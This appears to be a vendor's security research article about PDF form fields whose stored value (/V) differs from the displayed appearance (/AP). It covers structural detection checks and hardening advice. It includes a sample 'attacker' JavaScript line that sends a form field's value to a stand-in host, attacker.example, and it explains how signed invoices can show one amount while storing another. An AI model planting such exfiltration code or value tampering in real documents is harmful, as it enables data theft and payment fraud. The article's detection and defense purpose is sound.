PQ PDF Tools Secure document utilities for everyday workflows.

Security Research — Published 24 May 2026

PDF Forms as Executable Security Boundaries

A PDF form field has two independent representations of its value: /V, the machine-readable data value that JavaScript reads and form submission posts, and /AP, the appearance stream that the viewer renders as pixels on screen. They are not derived from each other. A digital signature can certify both while they disagree. This is the V/AP problem — and it is structurally provable from the raw byte stream, without rendering.

Structural indicators documented in this article
  • /NeedAppearances true — when paired with a digital signature, the certified content and displayed content are guaranteed to differ
  • Checkbox and radio /V vs /AS divergence — the most deterministic V/AP check: a pure dictionary key comparison
  • AP stream text extraction for text, listbox, and combobox fields — with /Opt export-value resolution and hex-string /V decoding
  • Field-value seeding in JavaScript behavioral analysis — why empty getField() returns cause conditional exploitation chains to be missed
  • DocMDP P=1 and DSS/LTV — the boundary ISO 32000-2 §12.8.2.2 draws between permitted and impermissible incremental updates

Background: Two Data Paths, One Signature

Marc Kaufman retired from Adobe having worked on every version of Acrobat from 2 through 12. He submitted a feedback report through our contact form pointing at a linearization gap in our scanner — our incremental-update detection used a set difference to find injected objects, which silently passed redefined objects carrying the same ID. We fixed it. He then pointed at MDP. We fixed that. He then asked how deep into the V/AP woods we wanted to go.

The answer to that question is the subject of this article.

Every AcroForm field has two independent data stores:

| Key | What it contains | Who reads it |
|---|---|---|
| /V | The machine-readable field value | JavaScript (doc.getField().value), form submission (SubmitForm), digital signature byte-range hash |
| /AP /N | A self-contained PDF content stream that the viewer renders as pixels | The viewer and the user; nothing else |

These two stores are not derived from each other. A PDF author can set /V to (I agree to transfer $1,000) and author an /AP stream that renders I agree to transfer $10. The user signs what they see. The signature covers both. The signed content and the displayed content are structurally different by construction, inside the certified byte range.

Known Exploitation Patterns

The V/AP gap has been documented in both academic research and operational fraud. In 2021, researchers at Ruhr University Bochum published “Shadow Attacks: Hiding and Replacing Content in Signed PDFs,” demonstrating that content can be concealed inside a signed byte range — invisible to signature validators, visible to the rendering viewer. The disclosure reached 28 PDF viewer vendors and produced patches in Adobe Acrobat, Foxit, and others. The attack class directly exploits the V/AP separation described here: placing different content in the display layer than in the data layer, both within the certified range.

In operational settings, the same mechanism appears in a simpler form. Signed invoice PDFs where an automated payment system reads /V while the human signer saw what /AP rendered are a documented pattern in business email compromise campaigns. A field that displays “$1,200.00” to the signer while /V holds “$12,000.00” survives signature validation intact.

Several concrete vulnerability patterns exploit the AcroForm field model and are detected by this scanner:

| CVE | Pattern | Mechanism |
|---|---|---|
| CVE-2021-28550 | AcroForm + getField / setFocus JavaScript | Use-after-free in Acrobat’s form field manipulation path, triggered by specific getField() and setFocus() call sequences in AcroForm JavaScript |
| CVE-2021-21017 | XFA + JavaScript + instanceManager | Heap buffer overflow via XFA form handling; exploited in the wild before patching. XFA is deprecated in PDF 2.0 but still rendered by Acrobat |
| CVE-2024-45112 | XFA/AcroForm mixed field access | Type confusion triggered when a document mixes XFA and AcroForm field access in the same session, a pattern not present in legitimately authored forms |
| CVE-2023-21608 | Annotation + event.target JavaScript | Use-after-free in the annotation engine triggered via event.target references in AcroForm field event handlers (CVSS 7.8) |

XFA-based forms more broadly have been observed in malware campaigns abusing FormCalc and JavaScript execution triggered at document open — a delivery mechanism less visible to scanners that focus on AcroForm JavaScript paths and do not inspect XFA-embedded scripting separately.

Five Structural Indicators: V/AP Divergence Without Rendering

The fundamental constraint for deterministic V/AP analysis is avoiding the renderer. Rasterising a field region and running OCR introduces renderer-specific differences, font fallback differences, DPI-dependent text segmentation, OCR nondeterminism, and false-positive rates that are incompatible with forensic guarantees. Every indicator below derives from the raw PDF object model, reproducibly, without opening the file in a viewer.

/NeedAppearances True

When /NeedAppearances true is present in the AcroForm dictionary (ISO 32000 §12.7.2), the viewer is instructed to regenerate /AP from /V at open time. The /AP streams stored on disk are stale by construction — they may not reflect /V. On its own this is medium severity: stale AP is common in programmatic form-fill workflows (mail merge, DocuSign) that update /V but skip AP regeneration before saving.

Combined with a digital signature it is critical. The byte-range hash covers the stale /AP streams stored in the file, but the viewer discards them and regenerates the appearance after opening. What the user sees is therefore never the certified appearance: it is produced at open time, outside the signed byte range, so no signed document with /NeedAppearances true can guarantee that the certified bytes are what the viewer renders.
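The severity rule for this indicator can be sketched in a few lines of Python. This is a minimal illustration, not the scanner's implementation: the function name is hypothetical, and it assumes the AcroForm and signature dictionaries appear uncompressed in the raw bytes (dictionaries hidden inside object streams would have to be decompressed first).

```python
import re
from typing import Optional

# Assumption: `raw` holds the whole file and the relevant dictionaries are
# not stored inside compressed object streams.
NEED_APPEARANCES = re.compile(rb"/NeedAppearances\s+true\b")
SIGNATURE = re.compile(rb"/ByteRange\s*\[")  # present in every signature dictionary


def need_appearances_severity(raw: bytes) -> Optional[str]:
    """Return None, 'medium', or 'critical' for the /NeedAppearances indicator."""
    if not NEED_APPEARANCES.search(raw):
        return None
    # Medium on its own; critical once a signature byte range is also present.
    return "critical" if SIGNATURE.search(raw) else "medium"
```

Matching on /ByteRange rather than /Sig is a design choice in this sketch: the byte range is what makes the stored /AP streams part of the certified content.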

Checkbox and Radio: /V vs /AS Key Comparison

For checkbox and radio button fields, /AS (Appearance State) selects which entry in /AP /N the viewer renders. /V is the stored data value. Both are name objects in the widget annotation dictionary. We extract both via regex against the xref object and compare them as strings — no rendering, no approximation.

If /V is /Yes and /AS is /Off, the displayed state and the stored value structurally disagree. That fact is in the file regardless of any viewer. This is the most deterministic V/AP check possible: a pure dictionary key comparison.

In a signed document both /V and /AS fall within the signed byte range. The mismatch is by construction inside certified content.
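A minimal sketch of the comparison, assuming the field and widget dictionaries are merged into one object (the common single-widget checkbox case) and that the dictionary source is available as bytes. The function name and regexes are illustrative, not the scanner's own. Radio groups, where /V sits on the parent field and each kid widget carries its own /AS, need the parent/kid relationship resolved before this comparison is meaningful.

```python
import re
from typing import Optional, Tuple

# A PDF name token: "/" followed by characters that are neither whitespace
# nor delimiters.
_NAME = rb"/([^\s/\[\]<>()]+)"
_V = re.compile(rb"/V\s*" + _NAME)    # matches only when /V holds a name object
_AS = re.compile(rb"/AS\s*" + _NAME)


def v_as_mismatch(widget_dict: bytes) -> Optional[Tuple[str, str]]:
    """Return (V, AS) when both are names and differ, otherwise None."""
    v = _V.search(widget_dict)
    a = _AS.search(widget_dict)
    if not v or not a:
        return None  # not a checkbox-style dictionary, or one key is missing
    v_name = v.group(1).decode("latin-1")
    as_name = a.group(1).decode("latin-1")
    return (v_name, as_name) if v_name != as_name else None
```

For example, `v_as_mismatch(b"<< /FT /Btn /V /Yes /AS /Off >>")` returns `("Yes", "Off")`.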

AP Stream Text Extraction: Text, Listbox, Combobox

For text fields, listboxes, and comboboxes, the /AP /N stream is a PDF content stream containing text drawing operators. We decompress it via PyMuPDF, extract Tj, TJ, and ' operators, reconstruct the display string, PDF-unescape it, whitespace-normalise it, and compare it to /V.

Three encoding cases are handled:

  • Literal string /V — /V (Hello) — extracted directly
  • Hex-string /V — /V <48656c6c6f> — decoded via bytes.fromhex(); UTF-16BE (BOM FEFF) detected and decoded correctly
  • Listbox multi-select array — /V [(opt1) (opt2)] or [<hex1> <hex2>] — elements joined for comparison
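The three cases can be sketched as one small decoder. This is an illustration under stated assumptions: the function names are hypothetical, Latin-1 stands in for PDFDocEncoding, backslash escapes inside literal strings are left untouched, and joining array elements with a single space is a choice made for this example (the text above says only that elements are joined).

```python
import re

_STRING_TOKEN = re.compile(rb"\((?:\\.|[^\\()])*\)|<[0-9A-Fa-f\s]*>")


def decode_pdf_string(data: bytes) -> str:
    """Decode string bytes: UTF-16BE when a FEFF BOM is present, else Latin-1."""
    if data.startswith(b"\xfe\xff"):
        return data[2:].decode("utf-16-be", errors="replace")
    return data.decode("latin-1")  # stand-in for PDFDocEncoding


def decode_v(token: bytes) -> str:
    """Decode a raw /V token: literal string, hex string, or array of either."""
    token = token.strip()
    if token.startswith(b"["):
        # Multi-select listbox: decode each element, then join for comparison.
        return " ".join(decode_v(t) for t in _STRING_TOKEN.findall(token))
    if token.startswith(b"<"):
        digits = re.sub(rb"\s+", b"", token[1:-1]).decode("ascii")
        if len(digits) % 2:
            digits += "0"  # PDF pads an odd final hex digit with 0
        return decode_pdf_string(bytes.fromhex(digits))
    if token.startswith(b"("):
        return decode_pdf_string(token[1:-1])  # escapes not processed here
    raise ValueError("unsupported /V token")
```

With this sketch, `decode_v(b"<48656c6c6f>")` and `decode_v(b"(Hello)")` both yield `"Hello"`, so the two encodings compare equal downstream.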

For listbox and combobox fields, /Opt can store export/display pairs: [[(us) (United States)] [(uk) (United Kingdom)]]. Each pair lists the export value first and the display label second. /V holds the export value (us); the /AP renders the display label (United States). Without resolving this map, every legitimately authored dropdown using export-value pairs would fire a false positive. We build an export→display map from /Opt and substitute the display label as the comparison target before checking.
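A sketch of the export-value resolution, assuming /Opt has already been parsed into Python values: each entry is either a plain string or a two-element [export, display] pair, with the export value first as ISO 32000 specifies. The function names are hypothetical.

```python
def display_target(v: str, opt: list) -> str:
    """Map an export value to its display label; plain options map to themselves."""
    export_to_display = {}
    for item in opt:
        if isinstance(item, (list, tuple)) and len(item) == 2:
            export, display = item
            export_to_display[export] = display
    return export_to_display.get(v, v)


def choice_field_mismatch(v: str, opt: list, ap_text: str) -> bool:
    """True when the AP text disagrees with /V after /Opt resolution."""
    def normalise(s: str) -> str:
        return " ".join(s.split())  # collapse runs of whitespace
    return normalise(ap_text) != normalise(display_target(v, opt))
```

With `opt = [["us", "United States"], ["uk", "United Kingdom"]]`, a field whose /V is `us` and whose appearance stream renders `United States` is not flagged, while one rendering `United Kingdom` is.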

When the /AP stream exists but contains no text drawing operators at all, we flag it separately: the value is present in the file and covered by any signature, but the field renders blank to the viewer.
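The extraction step and the blank-stream case can be sketched together. This is a simplified illustration, not the scanner's code: it assumes the stream has already been decompressed (for example with PyMuPDF's `Document.xref_stream`), handles literal strings only (hex strings inside the AP stream are skipped), concatenates successive show operations without a separator, and uses Latin-1 rather than the font's actual encoding.

```python
import re

# Literal string: "(" ... ")" with backslash escapes, no nested bare parens.
_LITERAL = rb"\((?:\\.|[^\\()])*\)"
# Tj, ' and " each show one string; TJ shows an array of strings and kerning.
_SHOW = re.compile(
    rb"(" + _LITERAL + rb")\s*(?:Tj|'|\")"
    rb"|\[((?:" + _LITERAL + rb"|[^\]()])*)\]\s*TJ",
    re.DOTALL,
)
_ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b",
            b"f": b"\f", b"\n": b""}  # backslash-newline is a continuation


def _unescape(body: bytes) -> bytes:
    def repl(m):
        if m.group(1) is not None:               # \ddd octal escape
            return bytes([int(m.group(1), 8) & 0xFF])
        return _ESCAPES.get(m.group(2), m.group(2))
    return re.sub(rb"\\(?:([0-7]{1,3})|(.))", repl, body, flags=re.DOTALL)


def ap_text(stream: bytes) -> str:
    """Reconstruct the shown text; an empty result means the AP renders blank."""
    parts = []
    for m in _SHOW.finditer(stream):
        if m.group(1) is not None:
            literals = [m.group(1)]
        else:
            literals = re.findall(_LITERAL, m.group(2), re.DOTALL)
        parts.extend(_unescape(lit[1:-1]) for lit in literals)
    return " ".join(b"".join(parts).decode("latin-1").split())
```

A stream for which `ap_text` returns an empty string while /V is non-empty corresponds to the separately flagged blank-appearance case.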

Value Set, No AP Defined

When /V is non-empty but no /AP stream exists, the viewer falls back to the field’s /DA (Default Appearance) and constructs a rendering itself. The displayed content is viewer-defined: it is not statically present in the file, and different viewers may render it differently. We rate this medium severity.

Correlation Engine Compound Patterns

Four compound indicators in the weighted correlation engine (Engine 44) fire on combinations:

| Combination | Severity | Why |
|---|---|---|
| /NeedAppearances + digital signature | Critical | Signed bytes are guaranteed to cover a different appearance than what the viewer displays |
| V/AS mismatch + digital signature | Critical | Displayed state and certified value structurally differ within the same signed byte range |
| /NeedAppearances + JS or SubmitForm | High | Stale AP paired with active form content: the displayed values may differ from what is executed or exfiltrated |
| /NeedAppearances + DocMDP constraint violation | Critical | Uncertified modification rendered visible via viewer-regenerated appearance |
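The four combinations can be expressed as a small rule table. This sketch deliberately omits the weighting the correlation engine applies and shows only the boolean conditions; the `Indicators` type and all field names are hypothetical.

```python
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class Indicators:
    """Per-file flags produced by the individual structural checks."""
    need_appearances: bool = False
    v_as_mismatch: bool = False
    signed: bool = False
    js_or_submit: bool = False
    docmdp_violation: bool = False


# (name, severity, predicate), in the same order as the table above.
RULES = [
    ("/NeedAppearances + digital signature", "critical",
     lambda i: i.need_appearances and i.signed),
    ("V/AS mismatch + digital signature", "critical",
     lambda i: i.v_as_mismatch and i.signed),
    ("/NeedAppearances + JS or SubmitForm", "high",
     lambda i: i.need_appearances and i.js_or_submit),
    ("/NeedAppearances + DocMDP constraint violation", "critical",
     lambda i: i.need_appearances and i.docmdp_violation),
]


def compound_findings(ind: Indicators) -> List[Tuple[str, str]]:
    """Return every compound pattern whose conditions all hold."""
    return [(name, sev) for name, sev, pred in RULES if pred(ind)]
```

A single indicator on its own produces no compound finding here; it is reported at its standalone severity by the individual check.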

Normal Interactive PDFs vs. Suspicious Patterns

AcroForms, JavaScript, and automatic actions are standard PDF features used legitimately in millions of documents every day. A sign-and-submit button uses JavaScript. A government tax form uses an AcroForm with /SubmitForm. An e-signature platform uses DocMDP to certify the signed content. A mail-merge system may legitimately produce documents with /NeedAppearances true because it updates /V programmatically without regenerating /AP. None of that is inherently suspicious.

The checks in this article target a specific subset of structural conditions that are rarely present in legitimately authored documents and frequently present in documents where the display and data layers have been deliberately decoupled:

| Feature | Normal use | Suspicious pattern |
|---|---|---|
| AcroForm + JavaScript | Field validation, conditional field visibility, submit-to-URL on a known endpoint | Field value read and posted to an external URL not visible in the document; conditional branch taken only when a specific field equals a pre-seeded value |
| /NeedAppearances true | Programmatic form fill where AP regeneration is deferred (DocuSign, mail merge) | /NeedAppearances true combined with a digital signature: the certified bytes are guaranteed to cover a different appearance than what the viewer shows |
| /V vs /AS on a checkbox | Should always match in a well-formed document | Structural mismatch: /V /Yes but /AS /Off, so the stored value and displayed state disagree by construction |
| AP stream text vs /V | Should agree after /Opt export-value resolution | AP renders “Approved” while /V holds “Rejected”; or AP stream is blank while /V is non-empty |
| DocMDP P=1 + incremental update | DSS/LTV additions permitted under ISO 32000-2 §12.8.2.2 | Incremental update containing form modifications, annotations, JavaScript, or OpenAction after a P=1 certifying signature |

A scanner finding a V/AP mismatch is not saying “this form is dangerous.” It is saying the file contains a structural condition that is worth examining: the value in the file and the value the viewer renders do not agree, and that disagreement is inside the certified byte range. Whether the cause is a buggy form authoring tool, a careless programmatic fill, or a deliberate manipulation is a question the indicator raises — not one it answers.

JavaScript Field-Value Conditioning: A Behavioral Analysis Gap

JavaScript behavioral emulation executes extracted PDF JavaScript in a sandboxed Node.js vm context with a stub of the Acrobat API. The gap documented here is not specific to any one implementation — it applies to any behavioral sandbox that does not seed doc.getField() with real /V values from the file. Previously, a stub returning { value: '' } for every field was a common default.

The practical consequence: when malicious JavaScript reads a field value and acts on it — submitting it to a URL, using it in a conditional branch, passing it to app.launchURL() — the emulator captured the event with an empty string rather than the actual content. Exploitation chains conditioned on field values were not followed correctly:

// Attacker JS inside the PDF
if (doc.getField('status').value == 'approved') {
    app.launchURL('https://attacker.example/c2?v=' + doc.getField('amount').value);
}

With value: '', the condition '' == 'approved' is false — the branch is never taken, the LAUNCH_URL event is never emitted, and the emulator reports clean.

The correct approach: the AcroForm field enumeration pass collects a field_values map (field name → /V string) during widget traversal. The behavioral emulator reads this map and prepends const _pq_fv = {...}; to the stub before execution. doc.getField(name) returns the real value from the file; doc.numFields reflects the true field count. SUBMIT_FORM and LAUNCH_URL events carry the actual field content. Signature fields are excluded — their /V is a PKCS#7 blob, not a meaningful string.
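A sketch of the seeding step on the Python side, assuming the emulator accepts a JavaScript prelude as a string. The `_pq_fv` name comes from the description above; the helper names and the stub body are hypothetical illustrations, not the emulator's actual stub.

```python
import json

# Hypothetical minimal stub; a real Acrobat API stub covers far more surface.
GETFIELD_STUB = """
const doc = {
  numFields: Object.keys(_pq_fv).length,
  getField(name) {
    const known = Object.prototype.hasOwnProperty.call(_pq_fv, name);
    return { value: known ? _pq_fv[name] : '' };
  },
};
"""


def build_field_prelude(field_values: dict, signature_fields=frozenset()) -> str:
    """Serialise field name -> /V string as a JS constant, skipping signature fields."""
    seeded = {name: value for name, value in field_values.items()
              if name not in signature_fields}
    # json.dumps output is a valid JavaScript object literal.
    return "const _pq_fv = " + json.dumps(seeded) + ";\n"


def seeded_script(field_values: dict, extracted_js: str,
                  signature_fields=frozenset()) -> str:
    """Prelude, then stub, then the JavaScript extracted from the PDF."""
    return (build_field_prelude(field_values, signature_fields)
            + GETFIELD_STUB + extracted_js)
```

With `{"status": "approved", "amount": "12000"}` seeded, the conditional in the attacker snippet above evaluates to true inside the sandbox and the launch event carries the real amount.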

DocMDP P=1 and DSS/LTV: What ISO 32000-2 Actually Permits

DocMDP P=1 means the certifying signature permits no modifications to the document whatsoever: not form fill-ins, not annotations, nothing. A naive implementation flags any incremental object after a P=1 signature as a bypass attempt. The problem is that ISO 32000-2 explicitly carves out an exception, so such an implementation misfires on a large class of legitimately authored documents.

Marc Kaufman pointed out the gap: ISO 32000-2 §12.8.2.2 NOTE 2 explicitly permits DSS (Document Security Store) and LTV (Long Term Validation) additions in an incremental update even under P=1.

DSS carries the material required to validate a digital signature long after the signing certificate’s OCSP responder or CRL distribution point may no longer be online: OCSP responses, certificate revocation lists, and the full certificate chain. Adding this material post-signing is a standard PAdES workflow — it does not modify the certified document content in any MDP sense. Every legitimately LTV-enabled P=1 document was being flagged critical.

The fix detects DSS-only incremental updates: the section contains /DSS or /VRI and has no execution vectors (no JavaScript, no /OpenAction), no annotations, no form elements, and no /AA additional actions. When P=1 and the incremental section is DSS-only, the scanner emits a low-severity informational note citing the spec section rather than a bypass finding. If DSS is mixed with any document modification or execution vector, the full bypass indicator fires as before.
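The DSS-only decision can be sketched as a token-level classifier over the bytes of one incremental section. The function name, return values, and token list are assumptions made for this example. A token scan like this is conservative: a DSS update that rewrites a catalog already containing /OpenAction would be treated as a bypass, so a fuller implementation would compare the rewritten objects against the previous revision.

```python
import re
from typing import Optional

_DSS = re.compile(rb"/(?:DSS|VRI)\b")
# Execution vectors, annotations, and form elements that disqualify the exemption.
_DISQUALIFYING = re.compile(
    rb"/(?:JavaScript|JS|OpenAction|AA|Annots?|Widget|FT)\b"
)


def classify_incremental_update(section: bytes, docmdp_p: int) -> Optional[str]:
    """Return 'low', 'critical', or None when the P=1 rule does not apply."""
    if docmdp_p != 1:
        return None  # P=2 and P=3 are handled by other rules
    if _DISQUALIFYING.search(section):
        return "critical"  # DSS mixed with modifications still fires the bypass
    if _DSS.search(section):
        return "low"       # DSS-only: informational note citing the spec section
    return "critical"      # any other post-certification change under P=1
```

The ordering matters: the disqualifying check runs first so that the presence of /DSS can never mask an execution vector in the same section.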

Note on scope

Field MDP (FieldMDP, /TransformMethod /FieldMDP) is a distinct transform from DocMDP. Where DocMDP applies a permission level to the entire document, FieldMDP applies per-approval-signature constraints to named form fields, specifying which fields are locked and which are not. Both are detected separately. The DSS/LTV exemption applies to DocMDP P=1 only; FieldMDP constraint validation is unchanged.

Structural Limits: What Rasterisation Cannot Provide

The question Marc Kaufman asked — “how far into the woods do you want to go?” — has a principled answer. Rasterising a field region and running Tesseract against it is technically possible. For deterministic, reproducible forensic analysis that must produce consistent results on the same file across runs, it is the wrong approach for reasons that are architectural, not merely practical.

The problems with rasterisation in this context:

  • Renderer-specific differences — MuPDF and Ghostscript render the same field differently
  • Font fallback differences — missing fonts produce different glyphs on different systems
  • DPI-dependent text segmentation — results change with render resolution
  • OCR nondeterminism — the same raster produces different strings across runs
  • Language-model bias — OCR engines correct toward plausible words, hiding injected content
  • False-positive rates that break the guarantees a forensics engine must provide
  • Unpredictable latency spikes on large form documents

Everything where V/AP divergence is provable from the raw byte stream — the cases where the file and the display disagree by construction — is covered by the five checks above. The one case that is not covered is a custom font with a remapped encoding where the glyph for code point 0x41 renders as “B” rather than “A” — detecting that requires either running a renderer or parsing the font’s encoding tables and comparing them against the AP stream’s character codes. That is a separate engine, not a V/AP check.

An Open Question: DocMDP P=2 and Incremental Form Fill-ins

DocMDP P=2 permits form fill-ins and digital signatures but prohibits any other modification. The interaction between P=2 and incremental form fill-ins is the one area Marc flagged as worth thinking about further. The specific edge case: a viewer that fills a form field incrementally under P=2, updating /V in the incremental section, is performing a permitted modification. If the viewer also regenerates the /AP stream in the same incremental section, whether that counts as permitted depends on whether the validator treats AP regeneration as a document change.

The practical consequence: a certified P=2 document could have been legitimately filled, producing an incremental /AP update that some validators accept and others reject. Our scanner currently flags all incremental object additions under P=2 that contain form elements as potential violations. Whether a specific update is legitimate depends on whether it was generated by a compliant form-fill operation or by an attacker modifying fields outside the permitted scope. We are tracking this as a known nuance, not a confirmed false positive.

Safe Handling and Configuration

The technical findings above have practical consequences for anyone who receives, processes, or routes PDF forms. These are not theoretical edge cases — they apply to signed contracts, regulatory filings, and any workflow where a PDF form value is treated as authoritative.

For Individuals: Viewer Settings

  • Disable JavaScript in Acrobat: Edit → Preferences → JavaScript → uncheck “Enable Acrobat JavaScript.” Most form functionality works without it. JS is only required for complex field validation and multi-step wizards.
  • Use Protected Mode / Protected View: Acrobat Reader’s Protected Mode (Windows, enabled by default since Reader X) sandboxes the renderer in a low-privilege process. Confirm it is active under Edit → Preferences → Security (Enhanced). Disable “trust files in my Documents folder” if you receive external forms.
  • Open in a browser for untrusted files: Firefox (pdf.js) and Chrome (its built-in PDFium viewer) open PDFs without Acrobat’s JavaScript engine. This does not prevent V/AP divergence from affecting the display, and both browsers still implement a restricted subset of form scripting, but it removes the Acrobat-specific JavaScript attack surface.
  • Verify fields independently: For any signed document where field values are legally or financially significant, confirm the visible value matches the form data by checking document properties or exporting form data as FDF/XFDF and comparing to what you see.

For Developers and Pipelines

  • Never trust /AP for authoritative field values. If you are processing form submissions from a PDF, read /V from the AcroForm dictionary — not text extracted from the appearance stream. Use a library that exposes the AcroForm object model (PyMuPDF, pdfminer, iText) rather than one that renders and OCRs.
  • Sanitize before storing: Strip /AP streams and rebuild them from /V when your pipeline is the authoritative writer. This eliminates divergence introduced by upstream tools. qpdf --generate-appearances regenerates appearance streams from field values.
  • Reject /NeedAppearances true in signed documents: If your pipeline accepts signed PDFs and treats them as authoritative, a file with /NeedAppearances true and a digital signature should be rejected or flagged for manual review — the signed content and the displayed content structurally cannot match.
  • Run forms through a static scanner before ingestion: If your system auto-processes form submissions (extract field values, trigger payment, update a record), scan the PDF before extraction. The field-value conditioning pattern — JavaScript that reads /V and posts it conditionally — is detectable statically and is rarely present in legitimately authored forms.

For Enterprise and IT

  • Group Policy (Windows): Adobe provides ADMX templates for Acrobat and Reader. Key settings include bEnableJS (disable JavaScript), bEnhancedSecurityInBrowser, and bEnhancedSecurityStandalone. These are available via the Adobe Enterprise Toolkit.
  • Email gateway configuration: Most email security gateways support PDF content inspection but vary in how deeply they inspect AcroForm structure. Where possible, configure your gateway to flag PDFs with JavaScript, OpenAction, and SubmitForm for manual review rather than auto-delivering them. /NeedAppearances true in combination with a signature is a narrower, more reliable signal.
  • Document verification workflows: For high-value signed documents (contracts, financial forms), consider a two-step verification: signature validation confirming the byte range is intact, followed by a structural audit confirming no V/AP divergence indicators. These are independent checks and both are necessary.
  • XFA: XFA forms are deprecated in PDF 2.0 and are not supported by many modern viewers, but Acrobat still renders them. If your environment has no business need to receive XFA forms, blocking them at the gateway eliminates a scripting attack surface that is distinct from AcroForm JavaScript and not always covered by the same scanner rules.

Detection Methodology Reference

The following table summarises the V/AP structural checks documented in this article. All operate on the raw PDF object model and do not require rendering. Severity escalates when indicators combine — the compound patterns in the weighted correlation analysis are documented in the “Correlation Engine Compound Patterns” table above.

| Structural check | What it finds | Severity conditions |
|---|---|---|
| /NeedAppearances true | AP streams are stale by construction; the viewer regenerates them from /V at open time | Medium alone; Critical when a digital signature is also present |
| Checkbox/radio /V vs /AS key comparison | Stored data value and displayed appearance state structurally disagree | High; Critical when inside a signed byte range |
| AP stream text extraction (text fields) | Tj/TJ operators reconstructed and compared to /V; literal and hex-string encoding handled | High; Critical when signed |
| AP stream text extraction (listbox/combobox) | Multi-select array extraction; /Opt export→display map resolved before comparison to prevent false positives on choice fields | High; Critical when signed |
| Blank AP stream | AP stream present but contains no text drawing operators: the value is in the file, but the field renders blank | Medium |
| Missing AP (/V set, no /AP) | Display is viewer-defined via /DA and not statically present in the file | Medium |
| Field-value seeding in JS behavioral analysis | doc.getField() stub receives real /V values; conditional exploitation chains that gate on field content are correctly followed | Applies to any JS indicator elevated by field-value conditioning |
| DocMDP P=1 + DSS-only incremental update | Incremental section contains /DSS or /VRI and no execution vectors, annotations, or form elements; permitted under ISO 32000-2 §12.8.2.2 | Low (informational); full bypass severity if DSS is mixed with execution vectors |

Marc Kaufman’s observation — that PDF/Acrobat is “a Roach Motel: features go in but never come out” — applies equally to the complexity that accumulates around those features over three decades. The checks above are designed to avoid false positives on legitimately authored documents; the /Opt export-value resolution and hex-string /V handling were added specifically to handle valid authoring patterns that naive string comparison would misread. Edge cases are possible; the structural indicators raise questions, not verdicts.


© 2026 PQ PDF — All rights reserved.
